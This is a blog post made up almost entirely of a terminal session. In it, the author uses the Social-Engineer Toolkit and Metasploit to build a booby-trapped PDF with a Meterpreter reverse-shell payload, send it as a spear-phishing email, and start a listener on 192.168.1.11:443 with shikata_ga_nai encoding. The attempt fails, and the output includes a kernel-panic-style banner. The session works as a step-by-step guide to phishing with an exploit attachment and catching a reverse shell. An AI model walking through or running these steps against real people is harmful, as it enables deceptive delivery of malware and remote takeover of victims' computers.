Metasploit spear-phishing attack vector (failed on BT5R1)
Source: Internet | Published: Cloud Computing, Chinese Academy of Sciences | Editor: 程序博客网 | Time: 2024/04/29 19:17
root@root:~# cd /pentest/exploits/set/
root@root:/pentest/exploits/set# ./set

:::=== :::===== :::====
::: ::: :::====
===== ====== ===
=== === ===
====== ======== ===

[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: Thomas Werth [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
[---] Version: 2.0.3 [---]
[---] Codename: 'Trebuchet Edition' [---]
[---] Report bugs to: davek@secmaniac.com [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: http://www.secmaniac.com [---]

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.

Join us on irc.freenode.net in channel #setoolkit

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) Third Party Modules
10) Update the Metasploit Framework
11) Update the Social-Engineer Toolkit
12) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

set > 1

The Spearphishing module allows you to specially craft email messages and send
them to a large (or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure "Sendmail" is in-
stalled (it is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template

99) Return to Main Menu

set:phishing > 1

Select the file format exploit you want.
The default is the PDF embedded EXE.

********** PAYLOADS **********

1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
5) Adobe Flash Player "Button" Remote Code Execution
6) Adobe CoolType SING Table "uniqueName" Overflow
7) Adobe Flash Player "newfunction" Invalid Pointer Use
8) Adobe Collab.collectEmailInfo Buffer Overflow
9) Adobe Collab.getIcon Buffer Overflow
10) Adobe JBIG2Decode Memory Corruption Exploit
11) Adobe PDF Embedded EXE Social Engineering
12) Adobe util.printf() Buffer Overflow
13) Custom EXE to VBA (sent via RAR) (RAR required)
14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
15) Adobe PDF Embedded EXE Social Engineering (NOJS)
16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow

set:payloads > 8

1) Windows Reverse TCP Shell               Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP         Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL                 Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64)         Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64)   Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64)            Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter

set:payloads > 2
set:payloads > Port to connect back on [443]:
[-] Defaulting to port 443...
[-] Generating fileformat exploit...
[*] Payload creation complete.
[*] All payloads get sent to the src/program_junk/src/program_junk/template.pdf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

set:phishing > 1
[*] Keeping the filename and moving on.

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer

99. Return to main menu.

set:phishing > 1

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

set:phishing > 1
[-] Available templates:
1: WOAAAA!!!!!!!!!! This is crazy...
2: How long has it been?
3: Have you seen this?
4: Baby Pics
5: Dan Brown's Angels & Demons
6: New Update
7: Computer Issue
8: Status Report
9: Strange internet usage from your computer
set:phishing > 8
set:phishing > Send email to: feier7501@126.com

1. Use a gmail Account for your email attack.
2. Use your own server or open relay

set:phishing > 1
set:phishing > Your gmail email address: : feier7501@gmail.com
Email password:
set:phishing >
set:phishing > Flag this message/s as high priority? [yes|no]: no
[*] SET has finished delivering the emails
set:phishing > Setup a listener [yes|no]: Unhandled exception in thread started by
I entered yes:
yes
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018 es: 0018 ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)

Stack: 90909090990909090990909090
       90909090990909090990909090
       90909090.90909090.90909090
       90909090.90909090.90909090
       90909090.90909090.09090900
       90909090.90909090.09090900
       ..........................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ccccccccc.................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       .................ccccccccc
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ..........................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffff..................
       ffffffff..................

Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing

       =[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
       =[ svn r13462 updated 652 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 652 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.11
LHOST => 192.168.1.11
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.1.11:443
[*] Starting the payload handler...
An exception was thrown above, and my 126 mailbox did not receive the email either.
The version is BT5R1; I will try a different version.